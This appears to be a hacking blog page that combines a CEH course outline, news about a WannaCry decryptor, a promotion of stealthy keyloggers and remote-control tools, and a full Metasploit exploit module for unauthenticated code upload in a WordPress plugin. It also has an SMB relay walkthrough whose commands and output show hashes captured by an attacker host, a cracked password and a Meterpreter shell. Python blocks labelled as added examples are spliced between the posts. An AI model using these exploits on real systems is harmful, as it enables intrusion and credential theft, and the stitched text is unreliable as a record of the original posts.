Free EC-Council Certified Ethical Hacker (C|EH) V10 Course
In 2009, the year of the Great Recession, we started CEH and covered all topics and tools. This year at hackguide4u we are about to start CEH v10. In this new course we will explore the fundamental concepts of system vulnerability assessment and penetration testing. After completing this course and practicing, anyone can take the CEH v10 certification exam in the near future. We at hackguide4u are not stopping at CEH: we will also cover EC-Council's Specialist, Advanced and Management courses.
By following EC-Council's official curriculum, this course is arranged according to five phases of hacking:
1- Reconnaissance
2- Scanning
3- Gaining Access
4- Maintaining Access
5- Covering Tracks
Almost all our readers are familiar with these terms and we will learn them again.
Video Labs will cover each topic and their tools in detail:
Footprinting and Reconnaissance
Scanning Network
Enumeration
Gaining Access
Vulnerability Analysis
System Hacking
Malware Threats
Sniffing
Social Engineering
Denial of Service
Session Hijacking
Evading IDS Firewalls and Honeypots
Accessing Networks and Applications
Hacking Web Servers
Hacking Web Applications
SQL Injection
Hacking Wireless Networks
Hacking Mobile Platforms
Cloud Computing
Cryptography
Maintaining Access
Covering Your Tracks
Lastly, welcome to Certified Ethical Hacking v10! I cannot wait to begin the course with such enthusiastic and eager scholars.

Hack WPA2-PSK clients with Key Re-installation Attacks
- Arch Linux: WPA Supplicant patch, Hostapd patch
- Aruba
- Debian/Ubuntu
- Microsoft
- Mikrotik
- Netgear: WAC120, WAC505/WAC510, WAC720/730, WN604, WNAP210v2, WNAP320, WNDAP350, WNDAP620, WNDAP660, WND930
- Ubiquiti

WannaCry Ransomware | Solution | Fix
Since the WannaCry ransomware ripped through the internet in May 2017, infecting hundreds of thousands of machines and locking up critical systems from health care to transportation, cryptographers have searched for a cure. Finding a flaw in WannaCry’s encryption scheme, after all, could decrypt all those systems without any ransom.
Now one French researcher says he’s found at least a hint of a very limited remedy. The fix still seems too buggy, and far from the panacea WannaCry victims have hoped for. But if Adrien Guinet’s claims hold up, his tool could unlock some infected computers running Windows XP, the aging, largely unsupported version of Microsoft’s operating system, which analysts believe accounts for some portion of the WannaCry plague.
"Does not erase the prime numbers from memory before freeing the associated memory," says Guinet. Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey.
"It does so by searching for them in the wcry.exe process. This is the process that generates the RSA private key. The main issue is that the CryptDestroyKey and CryptReleaseContext does not erase the prime numbers from memory before freeing the associated memory," says Guinet.
So, that means, this method will work only if:
- The affected computer has not been rebooted after being infected.
- The associated memory has not been allocated and erased by some other process.
"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.
Download Tool here @ https://github.com/gentilkiwi/wanakiwi/releases
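The recovery idea quoted above, searching process memory for a prime that was never wiped, can be sketched as follows. This is an added example, not code from WannaKey or wanakiwi; the 8-byte primes, the little-endian storage and the memory buffers are constructed assumptions chosen so the demo runs instantly.

```python
"""Added illustration (not WannaKey/wanakiwi code): find an unwiped RSA prime in memory."""
from typing import Optional, Tuple

# Constructed demo key: two small known primes stand in for the real key's primes.
P = 2**61 - 1                 # 8-byte prime
Q = 2**64 - 59                # 8-byte prime
N = P * Q                     # public modulus, known from the public key
E = 65537
PRIME_LEN = 8                 # assumption: primes are stored as fixed-size integers

# Constructed "process memory": filler, the leftover prime, more filler.
SAMPLE_MEMORY = b"\x41" * 37 + P.to_bytes(PRIME_LEN, "little") + b"\x00" * 16 + b"\x42" * 20
# The same region after another allocation overwrote the freed buffer.
WIPED_MEMORY = b"\x41" * 37 + b"\x00" * PRIME_LEN + b"\x00" * 16 + b"\x42" * 20


def find_prime_factor(memory: bytes, modulus: int,
                      prime_len: int) -> Optional[Tuple[int, int]]:
    """Return (offset, p) for the first prime_len-byte window whose value divides modulus."""
    for off in range(len(memory) - prime_len + 1):
        window = memory[off:off + prime_len]
        # Cheap filters: a full-length prime has a non-zero top byte and is odd.
        if window[-1] == 0 or window[0] & 1 == 0:
            continue
        cand = int.from_bytes(window, "little")  # assumption: little-endian storage
        if 1 < cand < modulus and modulus % cand == 0:
            return off, cand
    return None


def recover_private_exponent(memory: bytes, modulus: int = N, e: int = E,
                             prime_len: int = PRIME_LEN) -> Optional[int]:
    """Rebuild d from a leftover prime, or return None when the prime is gone."""
    hit = find_prime_factor(memory, modulus, prime_len)
    if hit is None:
        return None            # rebooted, or the freed memory was reused
    p = hit[1]
    q = modulus // p
    return pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    print("recovered d:", recover_private_exponent(SAMPLE_MEMORY))
    print("after reuse:", recover_private_exponent(WIPED_MEMORY))
```

The `None` result for the overwritten buffer corresponds to the two conditions listed above: once the machine reboots or the freed memory is reused, there is nothing left to find.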


Sharing my Penetration Testing Tools with Source
Tool categories are:
webscanner, smtp scanner, ipv6 scanner, android trojans, stealth keyloggers, stealth remote control software undetectable by AV, vpn scanner, dns scanner, inside out tools to fetch data within protected environments, tunneling tools, penetration checklists etc. etc. etc.
All of them have never been published before. I will release them one after the other including source code. Most of them are really easy to use. I started uploading them to code.google.
Here are some of the first uploads:
dns-information-gathering-tool - This tool does information gathering based on a domain name. - Google Project Hosting
android-security-demo-app - app and webserver to demonstrate how to control a remote phone via webserver - Google Project Hosting
ipv6-portable-portscanner - windows standalone portable portscanner ipv6 - Google Project Hosting
smtp-security-scanner - This tool identifies various vulnerabilities on a remote SMTP server (testing the remote SMTP daemon as well as external DB's). - Google Project Hosting
swat-web-security-scanner - windows scanner to identify sensitive web server files, methods etc. - Google Project Hosting
The more sophisticated (and dangerous ones) will come later....
oli.muenchow

WordPress Asset-Manager PHP File Upload Vulnerability
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description' => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author' =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL',
            'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html'
          ]
        ],
      'Payload' =>
        {
          'BadChars' => "\x00",
        },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil,
      "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. hackguide4u nor Adnan accepts
//responsibility for any damage caused by the use or misuse of
//this information
BY BOT24
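The module above leaves a recognisable two-request pattern in web server logs: a POST to the plugin's upload.php followed by a request for a .php file under uploads/assets/temp/. The following detection sketch is an added example, not part of the Metasploit module; the log lines are constructed and the finding labels are hypothetical names.

```python
"""Added illustration: flag Asset-Manager upload abuse in web access logs."""
import re
from typing import Iterable, List, Tuple

# Combined-log-format prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
# Both paths are the ones the module above requests.
UPLOAD_RE = re.compile(r'/wp-content/plugins/asset-manager/upload\.php(?:\?|$)', re.I)
TEMP_PHP_RE = re.compile(r'/wp-content/uploads/assets/temp/[^/?]+\.php(?:\?|$)', re.I)

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/May/2012:10:00:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 31',
    '203.0.113.7 - - [26/May/2012:10:00:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/AbCdE.php HTTP/1.1" 200 0',
    '198.51.100.9 - - [26/May/2012:10:03:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 5120',
    '198.51.100.9 - - [26/May/2012:10:03:11 +0000] "GET /wordpress/index.php HTTP/1.1" 200 9000',
    '192.0.2.44 - - [26/May/2012:10:05:40 +0000] "GET /wordpress/wp-content/uploads/assets/temp/x.php HTTP/1.1" 404 0',
]


def detect(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (client, finding, status) tuples in log order."""
    uploaders = set()          # clients that got a 200 from upload.php
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue           # not an access-log line we understand
        ip, method = m.group("ip"), m.group("method")
        path, status = m.group("path"), m.group("status")
        if method == "POST" and UPLOAD_RE.search(path):
            if status == "200":
                uploaders.add(ip)
            findings.append((ip, "plugin-upload-post", status))
        elif TEMP_PHP_RE.search(path):
            # A script in the temp upload directory should never be requested;
            # it is most serious when the same client uploaded just before.
            kind = "upload-then-execute" if ip in uploaders else "temp-php-request"
            findings.append((ip, kind, status))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```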

Executing SMB Relay Attacks via SQL Server using Metasploit
In this blog, I’ll provide a brief overview of SMB Relay attacks and show how they can be initiated through a Microsoft SQL Server. I will also provide some practical examples that show how to use new Metasploit modules to gain unauthorized access to SQL Servers during a penetration test. Below is a summary of what will be covered in this blog:
- A Brief History of SMB Relay
- Using SQL Server to Initiate SMB Authentication Attacks
- Using Metasploit Modules to Capture and Crack Hashes
- Using Metasploit Modules to Relay Authentication
A Brief History of SMB Relay
In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow SMB attacks to be successful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.
I guess the good news is that SMB relay attacks can be prevented by enabling and requiring SMB message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.
2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.
Anyway, let’s get back on track…
Using SQL Server to Initiate SMB Authentication Attacks
So how can we initiate SMB authentication through a SQL Server? As it turns out, SQL Server can interact with the file system in a number of different ways. For example, it supports functions for reading from files, providing directory listings, and checking if files exist. The xp_dirtree and xp_fileexist stored procedures are especially handy, because by default they can be executed by any login with the PUBLIC role in SQL Server 2000 to 2012.
How does this help us? Both the xp_dirtree and xp_fileexist stored procedures can support more than just local drives. They also support remote UNC paths (\\server\file). Also, every time the SQL Server attempts to access a remote file server via a UNC path it automatically attempts to authenticate to it with the SQL Server service account.
The normal authentication process that would occur when a SQL Server accesses a remote file share via a UNC path looks something like the diagram below:
In most enterprise environments the SQL Server service is configured with a domain account. What that means is an attacker could execute one of the prelisted stored procedures via SQL injection (or a valid SQL login) and relay the authentication to another database server to obtain a shell. Alternatively, an attacker could simply capture and crack the hashes offline. However, it should be noted that the SQL Server service can be configured with a number of different accounts. Below is a table showing the basic account configuration options and potential attacks.
Service Account | Network Communication | SMB Capture | SMB Relay |
NetworkService | Computer Account | Yes | No |
Local Administrator | Local Administrator | Yes | Yes |
Domain User | Domain User | Yes | Yes |
Domain Admin | Domain Admin | Yes | Yes |
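Because the technique depends on xp_dirtree or xp_fileexist being called with a UNC path, captured SQL statements can be screened for exactly that. The sketch below is an added example, not from the original post; the trace records, the login names other than the page's DEMO\test, and the allowed file server name are constructed assumptions.

```python
"""Added illustration: flag xp_dirtree / xp_fileexist calls that reach out over UNC paths."""
import re
from typing import FrozenSet, Iterable, List, Tuple

# Procedure name followed by a quoted string argument (optionally N'...').
# Limitation: a path passed in a @variable is not visible to this pattern.
PROC_RE = re.compile(
    r"\b(?P<proc>xp_dirtree|xp_fileexist)\b\s*\(?\s*N?'(?P<path>[^']*)'", re.I)
# UNC prefix: two slashes or backslashes, then the remote host.
UNC_HOST_RE = re.compile(r"^[\\/]{2}(?P<host>[^\\/]+)")

# Constructed trace records: (login, statement text).
SAMPLE_TRACE = [
    ("DEMO\\test", r"EXEC master..xp_dirtree '\\192.168.1.102\file'"),
    ("DEMO\\backup", r"exec master.dbo.xp_fileexist N'\\fs01.corp.example\dumps\full.bak'"),
    ("DEMO\\backup", r"EXEC master..xp_dirtree 'C:\backups', 1, 1"),
    ("webapp", r"SELECT 1; EXEC xp_fileexist '//192.168.1.102/a'"),
]
# Hypothetical allowlist of file servers the database is expected to touch.
ALLOWED_HOSTS = frozenset({"fs01.corp.example"})


def find_unc_calls(statement: str,
                   allowed: FrozenSet[str] = frozenset()) -> List[Tuple[str, str]]:
    """Return (procedure, remote_host) for each UNC call to a host not on the allowlist."""
    hits = []
    for m in PROC_RE.finditer(statement):
        host_m = UNC_HOST_RE.match(m.group("path"))
        if host_m is None:
            continue                      # local path such as C:\backups
        host = host_m.group("host").lower()
        if host not in allowed:
            hits.append((m.group("proc").lower(), host))
    return hits


def scan_trace(trace: Iterable[Tuple[str, str]],
               allowed: FrozenSet[str] = ALLOWED_HOSTS) -> List[Tuple[str, str, str]]:
    """Return (login, procedure, remote_host) alerts for a whole trace."""
    alerts = []
    for login, statement in trace:
        for proc, host in find_unc_calls(statement, allowed):
            alerts.append((login, proc, host))
    return alerts


if __name__ == "__main__":
    for alert in scan_trace(SAMPLE_TRACE):
        print(alert)
```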
Using Metasploit Modules to Capture and Crack Hashes
So now that you understand how the basics work, let’s walk through how to initiate SMB authentication through SQL server with the intent of gathering and cracking credentials for later use. In the diagram below, I’ve tried to illustrate what it would look like if an attacker initiated a connection from the SQL server to their evil server and captured hashes using a static nonce.
The attack scenario above can be automated using the “auxiliary/server/capture/smb” and “auxiliary/admin/mssql/mssql_ntlm_stealer” Metasploit modules. Below is a step by step example of how to capture and crack the credentials using those modules.
Systems for the scenario:
- SQL Server 1: 192.168.1.100
- Attacker System: 192.168.1.102
- Start the Metasploit “smb” capture module to grab password hashes on the attacker’s system:
    msfconsole
    use auxiliary/server/capture/smb
    set CAINPWFILE /cain_hashes.txt
    set JOHNPWFILE /john_hashes.txt
    exploit
- Execute the “mssql_ntlm_stealer” Metasploit module to initiate SMB authentication via SQL Server 1 using domain credentials:
    msfconsole
    use auxiliary/admin/mssql/mssql_ntlm_stealer
    set USE_WINDOWS_AUTHENT true
    set DOMAIN DEMO
    set USERNAME test
    set PASSWORD Password12
    set RHOST 192.168.1.100
    set RPORT 1433
    set SMBPROXY 192.168.1.102
    msf auxiliary(mssql_ntlm_stealer) > run
    [*] DONT FORGET to run a SMB capture or relay module!
    [*] Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree...
    [*] SMB Captured - 2012-11-26 10:45:35 -0600
    NTLMv1 Response Captured from 192.168.1.100:1051 - 192.168.1.100
    USER:sqlaccount DOMAIN:LVA OS:Windows Server 2003 3790 Service Pack 2 LM:
    LMHASH:b0b6932dae11731fc8ddf907024858f89fd700cd9fb72170
    NTHASH:c180596a2d116a3c70c329de3a7b097c15fb75cb07822d08
    [+] Successfully executed xp_dirtree on 192.168.1.100
    [+] Go check your SMB relay or capture module for goodies!
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
- Crack the first 16 characters of the recovered LANMAN hash with rcracki and a seeded half LM Rainbow Tables. Both can be downloaded from http://www.project-rainbowcrack.com.
    C:\>rcracki_mt -h b0b6932dae11731f ./halflmchall
    Using 1 threads for pre-calculation and false alarm checking...
    Found 4 rainbowtable files...
    halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti:
    reading index... 13528977 bytes read, disk access time: 0.14 s
    reading table... 461190920 bytes read, disk access time: 4.55 s
    searching for 1 hash...
    plaintext of b0b6932dae11731f is WINTER2
    cryptanalysis time: 0.96 s
    statistics
    -------------------------------------------------------
    plaintext found: 1 of 1 (100.00%)
    total disk access time: 4.68 s
    total cryptanalysis time: 0.96 s
    total pre-calculation time: 2.07 s
    total chain walk step: 2876401
    total false alarm: 1215
    total chain walk step due to false alarm: 1299561
    result
    -------------------------------------------------------
    b0b6932dae11731f WINTER2 hex:57494e54455232
- Crack the second half with john the ripper to obtain the case insensitive full LM password. Use the netntlm.pl script from the jumbo pack. They can be downloaded from http://www.openwall.com/john/.
    C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt
    …[TRUNCATED]…
    Loaded 1 password hash (LM C/R DES [netlm])
    WINTER2012 (sqlaccount)
    guesses: 1 time: 0:00:00:10 DONE (Mon Nov 26 10:59:56 2012) c/s: 428962 trying: WINTER204K - WINTER211IA
    …[TRUNCATED]…
- Run the same command again to obtain the case sensitive password.
    C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt
    …[TRUNCATED]…
    Performing NTLM case-sensitive crack for account: sqlaccount.
    guesses: 1 time: 0:00:00:00 DONE (Mon Nov 26 11:01:54 2012) c/s: 1454 trying: WINTER2012 - winter2012
    Use the "--show" option to display all of the cracked passwords reliably
    Loaded 1 password hash (NTLMv1 C/R MD4 DES [ESS MD5] [netntlm])
    Winter2012 (sqlaccount)
    …[TRUNCATED]…
Using Metasploit Modules to Relay SMB Authentication
Ok, now for the classic relay example. Below is a basic diagram showing how an attacker would be able to leverage a shared SQL Server service account being used by two SQL servers. All that’s required is a SQL injection or a SQL login that has the PUBLIC role.
Now that we have covered the visual, let’s walk through the practical attack using the mssql_ntlm_stealer module. This can be used during penetration tests to obtain a meterpreter session on SQL Servers that are using a shared service account.
Systems for the scenario:
- SQL Server 1: 192.168.1.100
- SQL Server 2: 192.168.1.101
- Attacker System: 192.168.1.102
- Start the Metasploit “smb_relay” module to relay authentication to SQL Server 2:
    msfconsole
    use exploit/windows/smb/smb_relay
    set SMBHOST 192.168.1.101
    exploit
- Configure and execute the “mssql_ntlm_stealer” Metasploit module against SQL Server 1:
    msfconsole
    use auxiliary/admin/mssql/mssql_ntlm_stealer
    set USE_WINDOWS_AUTHENT true
    set DOMAIN DEMO
    set USERNAME test
    set PASSWORD Password12
    set RHOST 192.168.1.100
    set RPORT 1433
    set SMBPROXY 192.168.1.102
    msf auxiliary(mssql_ntlm_stealer) > run
    [*] DONT FORGET to run a SMB capture or relay module!
    [*] Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree...
    [*] Received 192.168.1.100:1058 LVA\sqlaccount LMHASH:feefee989 c0b45f833b7635f0d2ffd667f4bd0019c952d5a NTHASH:8f3e0be3190fee6b d17b793df4ace8f96e59d324723fcc95 OS:Windows Server 2003 3790 Service Pack 2 LM:
    [*] Authenticating to 192.168.1.101 as LVA\sqlaccount...
    [*] AUTHENTICATED as LVA\sqlaccount...
    [*] Connecting to the ADMIN$ share...
    [*] Regenerating the payload...
    [*] Uploading payload...
    [*] Created \saEQcXca.exe...
    [*] Connecting to the Service Control Manager...
    [*] Obtaining a service manager handle...
    [*] Creating a new service...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Sending stage (752128 bytes) to 192.168.1.101
    [*] Closing service handle...
    [*] Deleting \saEQcXca.exe...
    [*] Sending Access Denied to 192.168.1.100:1058 LVA\sqlaccount
    [+] Successfully executed xp_dirtree on 192.168.1.100
    [+] Go check your SMB relay or capture module for goodies!
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf auxiliary(mssql_ntlm_stealer) >
    [*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1059) at 2012-11-26 11:54:18 -0600
Wrap Up
I would like to make it clear that none of these are original ideas. Techniques for initiating SMB relay attacks through SQL injection on database platforms like SQL Server have been around a long time. My hope is that the Metasploit modules can be used during penetration tests to help generate more awareness. To those out there trying to do a little good with a little bad – have fun and hack responsibly!
BY Scott Sutherland

SQL Fingerprint Xmas Released
Microsoft SQL Server fingerprinting can be a time-consuming process, because it involves trial and error methods to determine the exact version. Intentionally inserting an invalid input to obtain a typical error message, or using certain alphabets that are unique to a certain server, are two of the many ways to possibly determine the version, but most of them require authentication, permissions and/or privileges on Microsoft SQL Server to succeed.
Instead, ESF.pl uses a combination of crafted packets for SQL Server Resolution Protocol (SSRP) and Tabular Data Stream Protocol (TDS) (protocols natively used by Microsoft SQL Server) to accurately perform version fingerprinting and determine the exact Microsoft SQL Server version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism (Powered by Exploit Next Generation++ Technology), which is a much more reliable technique to determine the Microsoft SQL Server version. It is a tool intended to be used by:
This version is a complete rewrite in Perl, making ESF.pl much more portable than the previous binary version (Win32), and its original purpose is to be used as a tool to perform automated penetration tests. This version also adds the following Microsoft SQL Server versions to its fingerprint database:
- Microsoft SQL Server 2012 SP1 (CU1)
- Microsoft SQL Server 2012 SP1
- Microsoft SQL Server 2012 SP1 CTP4
- Microsoft SQL Server 2012 SP1 CTP3
- Microsoft SQL Server 2012 SP0 (CU4)
- Microsoft SQL Server 2012 SP0 (MS12-070)
- Microsoft SQL Server 2012 SP0 (CU3)
- Microsoft SQL Server 2012 SP0 (CU2)
- Microsoft SQL Server 2012 SP0 (CU1)
- Microsoft SQL Server 2012 SP0 (MS12-070)
- Microsoft SQL Server 2012 SP0 (KB2685308)
- Microsoft SQL Server 2012 RTM
Download: http://code.google.com
Source: http://code.google.com/p/sql-fingerprint-next-generation
